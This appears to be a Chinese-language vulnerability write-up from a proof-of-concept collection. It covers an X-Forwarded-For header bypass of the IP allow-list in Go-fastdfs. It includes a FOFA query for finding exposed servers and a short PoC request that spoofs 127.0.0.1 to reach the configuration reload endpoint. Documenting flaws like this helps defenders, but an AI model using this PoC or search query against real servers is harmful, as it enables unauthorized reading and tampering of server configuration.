Awesome-POC/Web应用漏洞/Go-fastdfs GetClientIp 未授权访问漏洞.md
2023-04-17 10:09:40 +08:00

65 lines
1.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Go-fastdfs GetClientIp 未授权访问漏洞
## 漏洞描述
Go-fastdfs GetClientIp方法存在XFF头绕过漏洞攻击者通过漏洞可以未授权调用接口获取配置文件等敏感信息
## 漏洞影响
```
Go-fastdfs
```
## FOFA
```
"go-fastdfs"
```
## 漏洞复现
主页面
![image-20230417094508409](images/image-20230417094508409.png)
调用读取配置接口,返回 ip 不允许访问
```
/group1/reload?action=get
```
![image-20230417094521737](images/image-20230417094521737.png)
追踪错误信息代码
![image-20230417094533985](images/image-20230417094533985.png)
![image-20230417094542486](images/image-20230417094542486.png)
跟一下 GetClientIp方法这里会从 X-Forwarded-For 等参数获取值
![image-20230417094554500](images/image-20230417094554500.png)
回到调用的起点,验证方法为调用 IsPeer 参数
![image-20230417094604965](images/image-20230417094604965.png)
![image-20230417094613037](images/image-20230417094613037.png)
这里主要是验证获取到的值是否为配置中的 AdminIps
![image-20230417094623353](images/image-20230417094623353.png)
在配置文件 cfg.json 中 admin_ips 默认为 127.0.0.1 (可被爆破)
![image-20230417100058531](images/image-20230417100058531.png)
所以通过设置 X-Forwarded-For 就可以绕过接口调用限制执行修改配置文件等操作验证POC
```
/group1/reload?action=get
X-Forwarded-For: 127.0.0.1
```
![image-20230417100112324](images/image-20230417100112324.png)